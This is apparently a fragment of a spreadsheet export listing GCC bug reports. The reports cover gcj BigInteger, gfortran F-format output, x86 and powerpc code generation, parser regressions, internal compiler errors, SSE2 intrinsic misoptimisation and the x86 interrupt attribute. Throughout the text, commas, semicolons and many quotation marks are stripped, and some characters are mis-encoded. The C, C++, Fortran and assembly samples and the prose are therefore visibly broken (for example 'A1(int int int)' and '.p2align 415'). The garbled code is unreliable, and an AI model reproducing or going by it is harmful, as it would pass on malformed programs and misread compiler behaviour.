This is simple enough and my gcj build is recent enough (and I produced it on prior builds but didn't know exactly what caused the problem since it was a large functioning program under a Sun JVM.
The compilation is very straitforward:
gcj --main=BigIntBug -o BigIntBug BigIntBug.java
or on the JVM
javac BigIntBug.java
If I now run BigIntBug I get:
./BigIntBug
The value is 8483895
Byte 0 is 0
Byte 1 is -127
Byte 2 is 116
Byte 3 is 55
After creating from its own internal array the value is 0
Notice that a 0 is produced.
If running under a jvm I get the following:
java -cp . BigIntBug
The value is 8483895
Byte 0 is 0
Byte 1 is -127
Byte 2 is 116
Byte 3 is 55
After creating from its own internal array the value is 8483895
Notice that the correct result is produced.</t>
  </si>
  <si>
    <t>GCC-47567</t>
  </si>
  <si>
    <t>Wrong output for small absolute values with F editing</t>
  </si>
  <si>
    <t>Fortran 2008 10.7.2.3.2(9):
For an internal value that is neither an IEEE inï¬nity nor a NaN the output field consists of blanks if necessary followed by a minus sign if the internal value is negative or an optional plus sign otherwise followed by a string of digits that contains a decimal symbol and represents the magnitude of the internal value as modiï¬ed by the established scale factor and rounded (10.7.2.3.7) to d fractional digits. Leading zeros are not permitted except
for an optional zero immediately to the left of the decimal symbol if the magnitude of the value in the output field is less than one. The optional zero shall appear if there would otherwise be no digits in the output field.
In gfortran with an (F0.0) edit descriptor some small values are formatted as . e.g.
    print (F0.0) 0.0   ! =&gt; 0.
    print (F0.0) 0.001 ! =&gt; . expected 0.
    print (F0.0) 0.01  ! =&gt; . expected 0.
    print (F0.0) 0.1   ! =&gt; 0.
Reason: The optional zero shall appear if there would otherwise be no digits in the output field.
Any formatting of non-negative values with (F1.n) should always result in asterisks because a string of digits that contains a decimal symbol where the optional zero shall appear if there would otherwise be no digits in the output field can never fit in 1. E. g.
    print (F1.0) 0.0   ! =&gt; 0 expected *
    print (F1.0) 0.001 ! =&gt; . expected *
    print (F1.0) 0.01  ! =&gt; . expected *
    print (F1.0) 0.1   ! =&gt; *
Similarly for negative values and (F2.n):
    print (F2.0) -0.001 ! =&gt; -. expected **
    print (F2.0) -0.01  ! =&gt; -. expected **
    print (F2.0) -0.1   ! =&gt; **
The exact value 0.0 is formatted with a leading zero with (F0.n) formatting but this is incorrect see bug 47434:
    print (F0.2) 0.0   ! =&gt; 0.00 expected .00</t>
  </si>
  <si>
    <t>GCC-63527</t>
  </si>
  <si>
    <t>[5 Regression] -fPIC uses 2 registers for GOT</t>
  </si>
  <si>
    <t>On Linux/x86 r216154 generates more instructions with -O2 -fPIC
for
----
struct cache_file
{
  char magic[sizeof ld.so-1.7.0 - 1]
  unsigned int nlibs
}
typedef unsigned int size_t
size_t cachesize __attribute__ ((visibility (hidden)))
struct cache_file *cache __attribute__ ((visibility (hidden)))
extern int __munmap (void *__addr size_t __len)
void
_dl_unload_cache (void)
{
  if (cache != ((void *)0) &amp;&amp; cache != (struct cache_file *) -1)
    {
      __munmap (cache cachesize)
      cache = ((void *)0) 
    }
}
----
r216153 generates
---
	.text
.LHOTB0:
	.p2align 415
	.globl	_dl_unload_cache
	.type	_dl_unload_cache @function
_dl_unload_cache:
	pushl	%ebx
	call	__x86.get_pc_thunk.bx
	addl	$_GLOBAL_OFFSET_TABLE_ %ebx
	subl	$8 %esp
	movl	cache@GOTOFF(%ebx) %eax
	leal	-1(%eax) %edx
	cmpl	$-3 %edx
	ja	.L1
	subl	$8 %esp
	pushl	cachesize@GOTOFF(%ebx)
	pushl	%eax
	call	__munmap@PLT
	movl	$0 cache@GOTOFF(%ebx)
	addl	$16 %esp
.L1:
	addl	$8 %esp
	popl	%ebx
	ret
	.size	_dl_unload_cache .-_dl_unload_cache
	.section	.text.unlikely
.LCOLDE0:
	.text
.LHOTE0:
	.hidden	cache
	.comm	cache44
	.hidden	cachesize
	.comm	cachesize44
	.section	.text.__x86.get_pc_thunk.bxaxG@progbits__x86.get_pc_thunk.bxcomdat
	.globl	__x86.get_pc_thunk.bx
	.hidden	__x86.get_pc_thunk.bx
	.type	__x86.get_pc_thunk.bx @function
__x86.get_pc_thunk.bx:
	movl	(%esp) %ebx
	ret
---
r216154 generates
--
	.text
.LHOTB0:
	.p2align 415
	.globl	_dl_unload_cache
	.type	_dl_unload_cache @function
_dl_unload_cache:
	pushl	%esi
	pushl	%ebx
	call	__x86.get_pc_thunk.si
	addl	$_GLOBAL_OFFSET_TABLE_ %esi
	subl	$4 %esp
	movl	cache@GOTOFF(%esi) %eax
	leal	-1(%eax) %edx
	cmpl	$-3 %edx
	ja	.L1
	subl	$8 %esp
	pushl	cachesize@GOTOFF(%esi)
	movl	%esi %ebx
	pushl	%eax
	call	__munmap@PLT
	movl	$0 cache@GOTOFF(%esi)
	addl	$16 %esp
.L1:
	addl	$4 %esp
	popl	%ebx
	popl	%esi
	ret
	.size	_dl_unload_cache .-_dl_unload_cache
	.section	.text.unlikely
.LCOLDE0:
	.text
.LHOTE0:
	.hidden	cache
	.comm	cache44
	.hidden	cachesize
	.comm	cachesize44
	.section	.text.__x86.get_pc_thunk.siaxG@progbits__x86.get_pc_thunk.sicomdat
	.globl	__x86.get_pc_thunk.si
	.hidden	__x86.get_pc_thunk.si
	.type	__x86.get_pc_thunk.si @function
__x86.get_pc_thunk.si:
	movl	(%esp) %esi
	ret
--
Why doesn't r216154 simply use %ebx to access cache cachesize
and __munmap?</t>
  </si>
  <si>
    <t>GCC-65413</t>
  </si>
  <si>
    <t>inefficient code returning aggregates on powerpc64le</t>
  </si>
  <si>
    <t>When returning aggregates that don't fit into a single register on powerpc64le gcc emits the assembly below which ultimately results in the same values in the r3 and r4 registers as it started out with.  All the shift and rotate instructions are unnecessary (and in fact foo could be as simple as a blr).
$ cat ~/tmp/x.c &amp;&amp; gcc -O2 -S -Wall -o/dev/tty ~/tmp/x.c
typedef struct { int a[3] } A
A __attribute__ ((noinline)) foo (A a) {
    return a
}
A bar (A a) {
    return foo (a)
}
	.file	x.c
	.machine power8
	.abiversion 2
	.section	.tocaw
	.section	.text
	.align 2
	.p2align 415
	.globl foo
	.type	foo @function
foo:
	mr 93
	li 30
	rldicl 109032
	srdi 9932
	rldimi 310032
	rldicl 44032
	rldimi 39320
	blr
	.long 0
	.byte 00000000
	.size	foo.-foo
	.align 2
	.p2align 415
	.globl bar
	.type	bar @function
bar:
0:	addis 212.TOC.-0b@ha
	addi 22.TOC.-0b@l
	.localentry	bar.-bar
	mflr 0
	std 016(1)
	stdu 1-64(1)
	bl foo
	addi 1164
	ld 016(1)
	mr 93
	li 30
	rldicl 109032
	srdi 9932
	rldimi 310032
	rldicl 44032
	mtlr 0
	rldimi 39320
	blr
	.long 0
	.byte 0001128000
	.size	bar.-bar
	.ident	GCC: (GNU) 5.0.0 20150303 (experimental)
	.section	.note.GNU-stack@progbits</t>
  </si>
  <si>
    <t>GCC-1685</t>
  </si>
  <si>
    <t>class java.lang.ThreadLocal is missing</t>
  </si>
  <si>
    <t>The class java.lang.ThreadLocal is missing
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-9333</t>
  </si>
  <si>
    <t>[3.4 regression] new parser rejects creation of complex templated class temporaries</t>
  </si>
  <si>
    <t>This is probably related to the (now fixed) c++/9112
I assume that this is a bug in the new parser....
temporary.cxx:
--------------
template
struct A1 {
    A1(int int int) {}
}
template
struct A2 {
    A2(int int) {}
}
template
struct B {
    int b
    void bar1() { A1(b b b) }
    void bar2() { A2(b b) }
    void bar3() { A1 a1(b b b) }
}
--------------
% gcc34 -c temporary.cxx
temporary.cxx: In member function `void B::bar1()':
temporary.cxx:14: error: expected init-declarator
temporary.cxx:14: error: expected `' or `'
bar2() [ not as many constructor arguments ] and bar3() [using an explicit temporary] work.
bar1() also works in gcc-3.3/gcc-3.2 and gcc-3.4 prior to the new parser merge.
I also tried the online Comeau-C++ compiler and Intel icc-7.0 and they both accepted the code as well.
Release:
gcc-3.4-20030115
Environment:
i686-pc-linux-gnu on a PIII system</t>
  </si>
  <si>
    <t>GCC-10246</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] libsupc++ needs to be independent (again) of libstdc++</t>
  </si>
  <si>
    <t>In the FAQ in docs/html/faq $2.4 says:
   If the only functions from libstdc++.a which you need are language
   support functions (those listed in [73]clause 18 of the standard
   e.g. new and delete) then try linking against libsupc++.a (usually
   specifying -lsupc++ when calling g++ for the final link step will do
   it). This library contains only those support routines one per object
   file. But if you are using anything from the rest of the library such
   as IOStreams or vectors then you'll still need pieces from
   libstdc++.a.
Thus given a test that does very little you'd expect that compiling it with
    gcc test.cpp -lsupc++
would succeed.  However with the attached test that does a call to std::terminate() the current devo tree (don't know about 3.3's branch) will fail to link with
/home/brendan/gcc/libstdc++-v3/libsupc++/vterminate.cc:66: undefined reference to `__cxa_demangle'
This added the use of demangling in terminate:
	2002-04-01 Phil Edwards 
        * config/linker-map.gnu:  Export __verbose_terminate_handler.
        * libsupc++/Makefile.am (sources):  Add cxa_demangle.c dyn-string.c.
        Make new LTCOMPILE variable use it in new special build rules.
        * libsupc++/Makefile.in:  Rebuild.
        * src/vterminate.cc (__verbose_terminate_handler):  Enable use of
        runtime __cxa_demangle.
And then vterminate moved to libsupc++ as well:
	2002-12-25  Phil Edwards  
	* src/vterminate.cc:  Move to...
	* libsupc++/vterminate.cc:  ...here.  New file.  Replace fprintf with
	writestr macro.  Slight reword to explanatory text.
	...
And recently demangle moved out of libsupc++:
	2003-02-27  Benjamin Kosnik  
        * src/Makefile.am (sources): Add demangle.cc.
        (demangle.o): Add.
        (demangle.lo): Add.     
        * src/Makefile.in: Regenerate.
        * libsupc++/Makefile.am: Remove old __cxa_demangle bits.
        * libsupc++/Makefile.in: Regenerate.
I believe that demangling has to go back into libsupc++ in order for  __verbose_terminate_handler to be able to use __cxa_demangle.
Release:
CVS tree 2003-03-27
Environment:
n/a
How-To-Repeat:
Build &amp; link the test with gcc 3.2 doing just
  gcc call-terminate.cpp -o t -lsupc++
You can then run ./t and see it call abort() from terminate().
But then build and link it with a source tree checked out since late February and you'll get the error that the linker can't resolve __cxa_terminate.</t>
  </si>
  <si>
    <t>brendan</t>
  </si>
  <si>
    <t>GCC-41242</t>
  </si>
  <si>
    <t>[4.5 Regression] PPC call rejected (related to user-defined assignment?)</t>
  </si>
  <si>
    <t>When compiling the following code gfortran does not correctly recognize a procedure pointer and crashes with the following message:
no_func.f90:59.12:
  n_in  = prc_lib% get_n_in (2)
          1
Error: 'prc_lib' at (1) is not a function
I attach the code and also as attachment:
module iso_varying_string
  implicit none
  type public :: varying_string
     private
     character(len=1) dimension(:) allocatable :: chars
  end type varying_string
  interface assignment(=)
     module procedure op_assign_VS_CH
  end interface assignment(=)
  public :: assignment(=)
contains
  elemental subroutine op_assign_VS_CH (string char)
    type(varying_string) intent(out) :: string
    character(len=*) intent(in)      :: char
    integer                           :: i
    allocate(string%chars(LEN(char)))
    forall(i = 1:len(char))
       string%chars(i) = char(i:i)
    end forall
  end subroutine op_assign_VS_CH
end module iso_varying_string
module no_func
  use iso_varying_string string_t =&gt; varying_string !NODEP!
  implicit none
  private
  type :: nf_t
     private
     procedure(prc_get_int) nopass pointer :: get_n_in  =&gt; null ()
  end type nf_t
  abstract interface
     function prc_get_int (pid) result (n)
       import
       integer intent(in) :: pid
       integer :: n
     end function prc_get_int
  end interface
contains
  subroutine no_func_config (prc_lib)
    type(nf_t) intent(inout) target :: prc_lib
    integer :: n_in
    type(string_t) :: prc_id
    prc_id = foobar
    n_in  = prc_lib% get_n_in  (2)
  end subroutine no_func_config
end module no_func</t>
  </si>
  <si>
    <t>reuter</t>
  </si>
  <si>
    <t>GCC-22537</t>
  </si>
  <si>
    <t>[4.0 Regression] unable to find a register to spill in class CREG</t>
  </si>
  <si>
    <t>compiling testcase:  
=== Cut === 
struct nand_chip { 
Â·       int Â·   Â·       page_shift 
Â·       intÂ·    Â·       phys_erase_shift 
} 
extern void foo( int ) 
static void nand_writev_ecc (int *mtd int *vecs unsigned long count) 
{ 
Â·       int i total_len 
Â·       struct nand_chip *this  
Â·       intÂ·    ppblock = (1 phys_erase_shift - this-&gt;page_shift)) 
Â·       total_len = count 
Â·       for (i = 0 i &lt; count i++) 
Â·       Â·       total_len+=ppblock 
        foo (ppblock) 
} 
=== Cut === 
with 
gcc -Os -march=k6 -mregparm=3 -fno-unit-at-a-time -c 
drivers/mtd/nand/nand_base.c 
gives: 
drivers/mtd/nand/nand_base.c:19: error: unable to find a register to spill in 
class CREG 
drivers/mtd/nand/nand_base.c:19: error: this is the insn: 
(insn:HI 19 18 46 0 (parallel [ 
            (set (reg/v:SI 3 bx [orig:59 ppblock ] [59]) 
                (ashift:SI (reg/v:SI 3 bx [orig:59 ppblock ] [59]) 
                    (subreg:QI (reg:SI 0 ax [orig:65 
.phys_erase_shift ] [65]) 0))) 
            (clobber (reg:CC 17 flags)) 
        ]) 280 {*ashlsi3_1} (insn_list:REG_DEP_TRUE 17 (insn_list:REG_DEP_TRUE 
18 (nil))) 
    (expr_list:REG_UNUSED (reg:CC 17 flags) 
        (expr_list:REG_DEAD (reg:SI 0 ax [orig:65 .phys_erase_shift ] 
[65]) 
            (expr_list:REG_UNUSED (reg:CC 17 flags) 
                (expr_list:REG_EQUAL (ashift:SI (const_int 1 [0x1]) 
                        (subreg:QI (reg:SI 67) 0)) 
                    (nil)))))) 
drivers/mtd/nand/nand_base.c:19: internal compiler error: in spill_failure at 
reload1.c:1878 
gcc version 4.0.1 20050701 (prerelease)</t>
  </si>
  <si>
    <t>mueller</t>
  </si>
  <si>
    <t>GCC-82702</t>
  </si>
  <si>
    <t>gcov intermediate format is creating multiple 'gcov' files it was creating a single file up to GCC 6</t>
  </si>
  <si>
    <t>Running gcov -i file.gcno was generating a single file (file.gcno.gcov) with info about all the files included in file.cpp.
Now it is creating multiple gcov files one for each included file.</t>
  </si>
  <si>
    <t>mcastelluccio</t>
  </si>
  <si>
    <t>GCC-82324</t>
  </si>
  <si>
    <t>Problem in new trunk test case gfortran.dg/promotion_4.f90</t>
  </si>
  <si>
    <t>The new test case gfortran.dg/promotion_4.f90 doesn't seem to compile correctly.  I saw this on powerpc64 both BE and LE.
make -k check-fortran RUNTESTFLAGS=dg.exp=gfortran.dg/promotion_4.f90
. . .
Running /home/seurer/gcc/gcc-test/gcc/testsuite/gfortran.dg/dg.exp ...
FAIL: gfortran.dg/promotion_4.f90   -O0  (test for excess errors)
FAIL: gfortran.dg/promotion_4.f90   -O1  (test for excess errors)
FAIL: gfortran.dg/promotion_4.f90   -O2  (test for excess errors)
FAIL: gfortran.dg/promotion_4.f90   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gfortran.dg/promotion_4.f90   -O3 -g  (test for excess errors)
FAIL: gfortran.dg/promotion_4.f90   -Os  (test for excess errors)
In the gfortran.log file from a full run:
Executing on host: /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/gfortran1/../../gfortran -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/gfortran1/../../ -B/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/ /home/seurer/gcc/gcc-trunk/gcc/testsuite/gfortran.dg/promotion_4.f90  -fno-diagnostics-show-caret -fdiagnostics-color=never    -O0  -fdefault-real-10  -B/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libatomic/.libs  -lm    -o ./promotion_4.exe    (timeout = 300)
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/gfortran1/../../gfortran -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/gfortran1/../../ -B/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/ /home/seurer/gcc/gcc-trunk/gcc/testsuite/gfortran.dg/promotion_4.f90 -fno-diagnostics-show-caret -fdiagnostics-color=never -O0 -fdefault-real-10 -B/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libgfortran/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64-unknown-linux-gnu/./libatomic/.libs -lm -o ./promotion_4.exe
f951: Fatal Error: REAL(KIND=10) is not available for '-fdefault-real-10' option
compilation terminated.
compiler exited with status 1
output is:
f951: Fatal Error: REAL(KIND=10) is not available for '-fdefault-real-10' option
compilation terminated.
FAIL: gfortran.dg/promotion_4.f90   -O0  (test for excess errors)
Excess errors:
f951: Fatal Error: REAL(KIND=10) is not available for '-fdefault-real-10' option
compilation terminated.
UNRESOLVED: gfortran.dg/promotion_4.f90   -O0  compilation failed to produce executable</t>
  </si>
  <si>
    <t>GCC-21239</t>
  </si>
  <si>
    <t>[4.0 Regression] Illegal elimination of SSE2 load/store using xmm intrinsics</t>
  </si>
  <si>
    <t>/** intrin.c   
 *   
 * gcc-4.0 misoptimizes the _mm_load_sd() away with   
 * -O1 (x86-64) with or without -m32 -msse2.   
 *   
 * (c) Kurt Garloff  Artistic v2   
 */   
#include                                                                               
#include                                                                            
#ifdef WORKAROUND                                                                                
# define ACCESS(X) asm(: : x(X))                                                             
#else                                                                                            
# define ACCESS(X)                                                                               
#endif                                                                                           
void do_copy(const unsigned int ln double* const dst      
                const double* const src)   
{   
        int i = ln   
        const register double *s = src   
        register double *d = dst   
        __m128d TMP   
        while (i) {   
                TMP = _mm_load_sd(s)   
                ACCESS(TMP)   
                _mm_store_sd(d TMP)   
                --i ++s ++d   
        }                                                                                        
}                                                                                                
int main()   
{   
        unsigned int i   
        double *a *b *c   
        a = (double*) malloc(19*sizeof(double))   
        b = (double*) malloc(19*sizeof(double))   
        for (i = 0 i &lt; 19 ++i) {   
                a[i] = 1 b[i] = 2   
        }                                                                                        
        do_copy(19 a b)   
        return (a[18] != 2)   
}                                                                                                
The test program should return 0 which it does if gcc-3.3/3.4 is used or if   
compiled with -DWORKAROUND. gcc-4.0 4_0-branch HEAD and   
tree-profiling-branch all fail: The _mm_load_sd() is optimized away.   
I guess the compiler does not consider the _mm_store_sd() as a consumer of   
the vector register. Adding the fake consumer asm(::x(XMMREG)) helps thus.  
Compiling with -m32 -msse2 exposes the same problem I have a strong suspicion  
the native compiler on x86 would have the same problem.  
Here's the wrong assembly produced by gcc-4.0 (on x86-64 using -O2):  
do_copy:  
.LFB495:  
        testl   %edi %edi  
        jne     .L8  
        rep  ret  
        .p2align 47  
.L8:  
        xorl    %eax %eax  
        .p2align 47  
.L4:  
        incl    %eax  
        movq    $0 (%rsi)  
        addq    $8 %rsi  
        cmpl    %eax %edi  
        jne     .L4  
        rep  ret  
... and here the correct assembly with -DWORKAROUND added:  
do_copy:  
.LFB495:  
        testl   %edi %edi  
        jne     .L8  
        rep  ret  
        .p2align 47  
.L8:  
        xorl    %eax %eax  
        .p2align 47  
.L4:  
        movsd   (%rdx) %xmm0  
        incl    %eax  
        movlpd  %xmm0 (%rsi)  
        addq    $8 %rdx  
        addq    $8 %rsi  
        cmpl    %eax %edi  
        jne     .L4  
        rep  ret</t>
  </si>
  <si>
    <t>GCC-38908</t>
  </si>
  <si>
    <t>[4.4 regression] Unexplained '' is used uninitialized in this function warning in cc1plus -m64</t>
  </si>
  <si>
    <t>cc1plus prints
x.cc: In member function 'typename S10::S12 S2::S5::S13() [with T = S8 ()()]':
x.cc:15: error: '' is used uninitialized in this function
in a gcc 4.4 trunk compilation of the C++ appended below for a 64-bit target.  It's unclear what precisely is uninitialized here and the same warning does not appear for 32-bit targets.  This warning also doesn't appear in gcc 4.3.1 or earlier.
$ cat x.cc
struct S8 { template S8(T) { } }
template struct S10
template struct S10 { typedef T S12 typedef S8 S1() }
template struct S3 { }
template struct S11 { S11(S3) }
struct S2
{
  template operator S11() { return S11(S5()) }
  template struct S5:public S3
  {
    virtual typename S10::S12 S13() {
      return 0
    }
  }
}
template S11 S6(S3) { return S11(S3()) }
template struct S7 { typedef S12 S15() }
struct S4
{
  template operator S11()
  {
    struct S14:public S3
    { 
      S14(S2 x):S11_(x) { }
      S11::S12&gt;::S15&gt; S11_
    }
    return S6(S14(S11_))
  }
  S2 S11_
}
struct S9
{
  template operator S11() { return S11(S14(S11_)) }
  template struct S14:public S3
  {
    S14(S4 x):S11_(x) { }
    S11::S1&gt; S11_
  }
  S4 S11_
}
void S15(S11)
void S16() { S9 x S15(x) }
$ cc1plus -Werror -m32 -version -quiet x.cc -O1 -Wuninitialized -o /dev/null
GNU C++ (GCC) version 4.4.0 20090118 (experimental) (x86_64-unknown-linux-gnu)
   compiled by GNU C version 4.0.3 (Ubuntu 4.0.3-1ubuntu5) GMP version 4.2.2 MPFR version 2.3.1.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 3943547ae1329ecd45283a86831b8d94
$ echo $?
0
$ cc1plus -Werror -m64 -version -quiet x.cc -O1 -Wuninitialized -o /dev/null
GNU C++ (GCC) version 4.4.0 20090118 (experimental) (x86_64-unknown-linux-gnu)
   compiled by GNU C version 4.0.3 (Ubuntu 4.0.3-1ubuntu5) GMP version 4.2.2 MPFR version 2.3.1.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 3943547ae1329ecd45283a86831b8d94
cc1plus: warnings being treated as errors
x.cc: In member function 'typename S10::S12 S2::S5::S13() [with T = S8 ()()]':
x.cc:15: error: '' is used uninitialized in this function
$ echo $?
1</t>
  </si>
  <si>
    <t>simon_baldwin</t>
  </si>
  <si>
    <t>GCC-14403</t>
  </si>
  <si>
    <t>Syntax error befor `' reported where there is no semicolon</t>
  </si>
  <si>
    <t>G++ hallucinates and imagines a semicolon on line 2
although there is none:
% cat wrong-syntax-error.cpp
struct foo {
  foo() : f[ 0 ]( 0 ) {}
  int f[ 1 ] 
} 
% g++ -c wrong-syntax-error.cpp 
wrong-syntax-error.cpp: In constructor `foo::foo()':
wrong-syntax-error.cpp:2: error: parse error before `' token
% g++ (GCC) 3.3.1 (SuSE Linux)</t>
  </si>
  <si>
    <t>gwesp</t>
  </si>
  <si>
    <t>GCC-60306</t>
  </si>
  <si>
    <t>[4.9 Regression] Incorrect devirtualization pure virtual method called</t>
  </si>
  <si>
    <t>Created attachment 32192
File that exhibits the compilation error.
When compiled with GCC 4.9 my C++ code gives:
pure virtual method called
terminate called without an active exception
Aborted
This goes away if I compile with -fno-devirtualize or if I compile with GCC 4.8.2.
I compiled with:
% g++-4.9 -O3 main.C -std=c++11 -g
% ./a.out</t>
  </si>
  <si>
    <t>GCC-5354</t>
  </si>
  <si>
    <t>function call with two statement expressions yields incorrect result</t>
  </si>
  <si>
    <t xml:space="preserve">	
When calling a function where two arguments are computed using ({...})
statement expressions the generated code computes the incorrect
value for one of the arguments.  Specifically it appears that
whichever statement expression is computed *last* is taken as the
value for *both* arguments.
Release:
3.1 20020110 (experimental)
Environment:
System: Linux brawnix.CS.Berkeley.EDU 2.4.17 #4 Fri Dec 28 23:34:16 PST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../src/configure --prefix=/var/local/liblit/gcc-cvs/install
How-To-Repeat:
Compile and run the following code:
------------------------------------------------------------------------
	extern int printf(__const char *__restrict __format ...)
	void f(int x int y)
	{
	  printf(f(%d %d)\n x y)
	}
	int main()
	{
	  f(({ int temp1 = 1 temp1 })
	    ({ int temp2 = 2 temp2 }))
	  return 0
	}
------------------------------------------------------------------------
gcc-2.96 produces the correct output:
	f(1 2)
gcc-3.0.1 which computes the arguments for the call to g from right
to left produces the following incorrect output:
	f(1 1)
gcc CVS snapshot as of 10-Jan-2002 which computes the arguments for
the call to g from left to right produces the following incorrect
output:
	f(2 2)</t>
  </si>
  <si>
    <t>liblit</t>
  </si>
  <si>
    <t>GCC-48281</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] [C++0x] internal compiler error: in record_reference at cgraphbuild.c:60</t>
  </si>
  <si>
    <t>The code that triggered this bug is almost certainly in error but as its caused an internal compiler error it seemed worth reporting. That said I don't really know *what* caused the bug except to say that it happened when I declared my four matrix variables in the attached code (M a ... M d) to be static.
The code is one unit test from an ongoing project and I've provided the plain .cpp code (for reference) and a pre-processed file so you have a chance to reproduce the bug.
In case it matters here are my system specs:
$ g++ --version
g++ (Debian 4.6.0~rc1-2) 4.6.0 20110320 (prerelease)
Copyright (C) 2011 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ uname -a
Linux timelord 2.6.36-zen2-sti-02 #4 ZEN SMP PREEMPT Fri Jan 7 13:21:12 EST 2011 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>swestrup</t>
  </si>
  <si>
    <t>GCC-68037</t>
  </si>
  <si>
    <t>x86 interrupt attribute doesn't work with DRAP</t>
  </si>
  <si>
    <t>ix86_expand_prologue has
 /* Emit prologue code to adjust stack alignment and setup DRAP in case
     of DRAP is needed and stack realignment is really needed after reload */
  if (stack_realign_drap)
    {
      int align_bytes = crtl-&gt;stack_alignment_needed / BITS_PER_UNIT
      /* Only need to push parameter pointer reg if it is caller saved.  */
      if (!call_used_regs[REGNO (crtl-&gt;drap_reg)])
        {
          /* Push arg pointer reg */
          insn = emit_insn (gen_push (crtl-&gt;drap_reg))
          RTX_FRAME_RELATED_P (insn) = 1
        }
      /* Grab the argument pointer.  */
      t = plus_constant (Pmode stack_pointer_rtx m-&gt;fs.sp_offset)
      insn = emit_insn (gen_rtx_SET (crtl-&gt;drap_reg t))
      RTX_FRAME_RELATED_P (insn) = 1
      m-&gt;fs.cfa_reg = crtl-&gt;drap_reg
      m-&gt;fs.cfa_offset = 0
      /* Align the stack.  */
      insn = emit_insn (ix86_gen_andsp (stack_pointer_rtx
                                        stack_pointer_rtx
                                        GEN_INT (-align_bytes)))
      RTX_FRAME_RELATED_P (insn) = 1
      /* Replicate the return address on the stack so that return
         address can be reached via (argp - 1) slot.  This is needed
         to implement macro RETURN_ADDR_RTX and intrinsic function
         expand_builtin_return_addr etc.  */
      t = plus_constant (Pmode crtl-&gt;drap_reg -UNITS_PER_WORD)
      t = gen_frame_mem (word_mode t)
      insn = emit_insn (gen_push (t))
      RTX_FRAME_RELATED_P (insn) = 1
It doesn't work with interrupt attribute:
[hjl@gnu-6 interrupt-9]$ cat bar.i
typedef unsigned int uword_t __attribute__ ((mode (__word__)))
uword_t error
uword_t ip
struct interrupt_frame
{
  uword_t ip
  uword_t cs
  uword_t flags
}
__attribute__((interrupt))
void
fn (struct interrupt_frame *frame)
{
  if (ip != frame-&gt;ip)
    __builtin_abort ()
}
[hjl@gnu-6 interrupt-9]$ /export/build/gnu/gcc-x32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/ -O2   -S bar.i    
[hjl@gnu-6 interrupt-9]$ cat bar.s
	.file	bar.i
	.text
	.p2align 415
	.globl	fn
	.type	fn @function
fn:
.LFB0:
	.cfi_startproc
	pushq	%r13
	.cfi_def_cfa_offset 16
	.cfi_offset 13 -16
	leaq	16(%rsp) %r13
	.cfi_def_cfa 13 0
	andq	$-16 %rsp
	pushq	-8(%r13)
	pushq	%rbp
	.cfi_escape 0x100x60x20x760
	movq	%rsp %rbp
	pushq	%r11
	pushq	%r10
	pushq	%r9
	pushq	%r8
	pushq	%rdi
	pushq	%rsi
	pushq	%rcx
	pushq	%rdx
	pushq	%rax
	subq	$264 %rsp
	.cfi_escape 0x100xb0x20x760x78
	.cfi_escape 0x100xa0x20x760x70
	.cfi_escape 0x100x90x20x760x68
	.cfi_escape 0x100x80x20x760x60
	.cfi_escape 0x100x50x20x760x58
	.cfi_escape 0x100x40x20x760x50
	.cfi_escape 0x100x20x20x760x48
	.cfi_escape 0x100x10x20x760x40
	.cfi_escape 0x1000x30x760xb80x7f
	movq	ip(%rip) %rax
	cmpq	%rax 8(%rbp)
                        ^^^^^
RBP doesn't point to the interrupt data on stack.
	movups	%xmm0 -328(%rbp)
	.cfi_escape 0x100x110x30x760xb80x7d
	movups	%xmm1 -312(%rbp)
	.cfi_escape 0x100x120x30x760xc80x7d
	movups	%xmm2 -296(%rbp)
	.cfi_escape 0x100x130x30x760xd80x7d
	movups	%xmm3 -280(%rbp)
	.cfi_escape 0x100x140x30x760xe80x7d
	movups	%xmm4 -264(%rbp)
	.cfi_escape 0x100x150x30x760xf80x7d
	movups	%xmm5 -248(%rbp)
	.cfi_escape 0x100x160x30x760x880x7e
	movups	%xmm6 -232(%rbp)
	.cfi_escape 0x100x170x30x760x980x7e
	movups	%xmm7 -216(%rbp)
	.cfi_escape 0x100x180x30x760xa80x7e
	movups	%xmm8 -200(%rbp)
	.cfi_escape 0x100x190x30x760xb80x7e
	movups	%xmm9 -184(%rbp)
	.cfi_escape 0x100x1a0x30x760xc80x7e
	movups	%xmm10 -168(%rbp)
	.cfi_escape 0x100x1b0x30x760xd80x7e
	movups	%xmm11 -152(%rbp)
	.cfi_escape 0x100x1c0x30x760xe80x7e
	movups	%xmm12 -136(%rbp)
	.cfi_escape 0x100x1d0x30x760xf80x7e
	movups	%xmm13 -120(%rbp)
	.cfi_escape 0x100x1e0x30x760x880x7f
	movups	%xmm14 -104(%rbp)
	.cfi_escape 0x100x1f0x30x760x980x7f
